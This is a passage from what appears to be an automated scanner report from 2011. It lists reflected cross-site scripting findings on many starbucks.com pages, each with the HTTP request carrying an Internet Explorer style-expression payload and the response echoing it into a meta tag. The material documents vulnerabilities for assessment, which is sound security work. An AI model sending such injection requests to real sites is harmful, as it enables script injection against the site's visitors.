Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:48 GMT
Connection: close
Content-Length: 40326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/climate-change?8714c"style="x:expression(alert(1))"f8e10288012=1"/>
...[SNIP]...

2.301. http://www.starbucks.com/responsibility/environment/energy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59bfc"style%3d"x%3aexpression(alert(1))"c24986dd6f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59bfc"style="x:expression(alert(1))"c24986dd6f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment/energy?59bfc"style%3d"x%3aexpression(alert(1))"c24986dd6f7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:26 GMT
Connection: close
Content-Length: 39146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/energy?59bfc"style="x:expression(alert(1))"c24986dd6f7=1"/>
...[SNIP]...

2.302. http://www.starbucks.com/responsibility/environment/explore-green-store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/explore-green-store

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be99d"style%3d"x%3aexpression(alert(1))"dce46789f55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be99d"style="x:expression(alert(1))"dce46789f55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment/explore-green-store?be99d"style%3d"x%3aexpression(alert(1))"dce46789f55=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:15 GMT
Connection: close
Content-Length: 36700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/explore-green-store?be99d"style="x:expression(alert(1))"dce46789f55=1" />
...[SNIP]...

2.303. http://www.starbucks.com/responsibility/environment/green-building [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/green-building

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81427"style%3d"x%3aexpression(alert(1))"70b16b5ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81427"style="x:expression(alert(1))"70b16b5ded in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment/green-building?81427"style%3d"x%3aexpression(alert(1))"70b16b5ded=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:37 GMT
Connection: close
Content-Length: 40773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/green-building?81427"style="x:expression(alert(1))"70b16b5ded=1"/>
...[SNIP]...

2.304. http://www.starbucks.com/responsibility/environment/recycling [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/recycling

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8710"style%3d"x%3aexpression(alert(1))"183500e045d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8710"style="x:expression(alert(1))"183500e045d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment/recycling?a8710"style%3d"x%3aexpression(alert(1))"183500e045d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:25 GMT
Connection: close
Content-Length: 43161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/recycling?a8710"style="x:expression(alert(1))"183500e045d=1"/>
...[SNIP]...

2.305. http://www.starbucks.com/responsibility/environment/water [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/water

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd1dc"style%3d"x%3aexpression(alert(1))"3a75d5838b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd1dc"style="x:expression(alert(1))"3a75d5838b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment/water?cd1dc"style%3d"x%3aexpression(alert(1))"3a75d5838b9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:30 GMT
Connection: close
Content-Length: 39187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/water?cd1dc"style="x:expression(alert(1))"3a75d5838b9=1"/>
...[SNIP]...

2.306. http://www.starbucks.com/responsibility/learn-more/goals-and-progress [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/goals-and-progress

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2e8"style%3d"x%3aexpression(alert(1))"0acfa560360 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e2e8"style="x:expression(alert(1))"0acfa560360 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/learn-more/goals-and-progress?4e2e8"style%3d"x%3aexpression(alert(1))"0acfa560360=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:18 GMT
Connection: close
Content-Length: 45450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/goals-and-progress?4e2e8"style="x:expression(alert(1))"0acfa560360=1" />
...[SNIP]...

2.307. http://www.starbucks.com/responsibility/learn-more/policies [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/policies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dacc1"style%3d"x%3aexpression(alert(1))"58441f58f39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dacc1"style="x:expression(alert(1))"58441f58f39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/learn-more/policies?dacc1"style%3d"x%3aexpression(alert(1))"58441f58f39=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:16 GMT
Connection: close
Content-Length: 38100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/policies?dacc1"style="x:expression(alert(1))"58441f58f39=1"/>
...[SNIP]...

2.308. http://www.starbucks.com/responsibility/learn-more/relationships [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/relationships

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39d95"style%3d"x%3aexpression(alert(1))"d979f153017 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39d95"style="x:expression(alert(1))"d979f153017 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/learn-more/relationships?39d95"style%3d"x%3aexpression(alert(1))"d979f153017=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:16 GMT
Connection: close
Content-Length: 48018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/relationships?39d95"style="x:expression(alert(1))"d979f153017=1"/>
...[SNIP]...

2.309. http://www.starbucks.com/responsibility/learn-more/shared-values-blog [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/shared-values-blog

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa51c"style%3d"x%3aexpression(alert(1))"92ca21ea562 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa51c"style="x:expression(alert(1))"92ca21ea562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/learn-more/shared-values-blog?fa51c"style%3d"x%3aexpression(alert(1))"92ca21ea562=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:46 GMT
Connection: close
Content-Length: 46392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/shared-values-blog?fa51c"style="x:expression(alert(1))"92ca21ea562=1"/>
...[SNIP]...

2.310. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/starbucks-shared-planet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21608"style%3d"x%3aexpression(alert(1))"cf8f3b757dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21608"style="x:expression(alert(1))"cf8f3b757dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/learn-more/starbucks-shared-planet?21608"style%3d"x%3aexpression(alert(1))"cf8f3b757dc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:34 GMT
Connection: close
Content-Length: 37394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet?21608"style="x:expression(alert(1))"cf8f3b757dc=1"/>
...[SNIP]...

2.311. http://www.starbucks.com/responsibility/sourcing [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab705"style%3d"x%3aexpression(alert(1))"0db2c74b13d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab705"style="x:expression(alert(1))"0db2c74b13d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing?ab705"style%3d"x%3aexpression(alert(1))"0db2c74b13d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:01 GMT
Connection: close
Content-Length: 51277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing?ab705"style="x:expression(alert(1))"0db2c74b13d=1"/>
...[SNIP]...

2.312. http://www.starbucks.com/responsibility/sourcing/cocoa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/cocoa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 649df"style%3d"x%3aexpression(alert(1))"f64e12d5982 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 649df"style="x:expression(alert(1))"f64e12d5982 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/cocoa?649df"style%3d"x%3aexpression(alert(1))"f64e12d5982=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:54 GMT
Connection: close
Content-Length: 38743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/cocoa?649df"style="x:expression(alert(1))"f64e12d5982=1"/>
...[SNIP]...

2.313. http://www.starbucks.com/responsibility/sourcing/coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ba4"style%3d"x%3aexpression(alert(1))"aa5721e012a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c4ba4"style="x:expression(alert(1))"aa5721e012a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/coffee?c4ba4"style%3d"x%3aexpression(alert(1))"aa5721e012a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:09 GMT
Connection: close
Content-Length: 40989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/coffee?c4ba4"style="x:expression(alert(1))"aa5721e012a=1"/>
...[SNIP]...

2.314. http://www.starbucks.com/responsibility/sourcing/farmer-support [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/farmer-support

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57860"style%3d"x%3aexpression(alert(1))"35fa26ea488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57860"style="x:expression(alert(1))"35fa26ea488 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/farmer-support?57860"style%3d"x%3aexpression(alert(1))"35fa26ea488=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:45 GMT
Connection: close
Content-Length: 39451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing/farmer-support?57860"style="x:expression(alert(1))"35fa26ea488=1"/>
...[SNIP]...

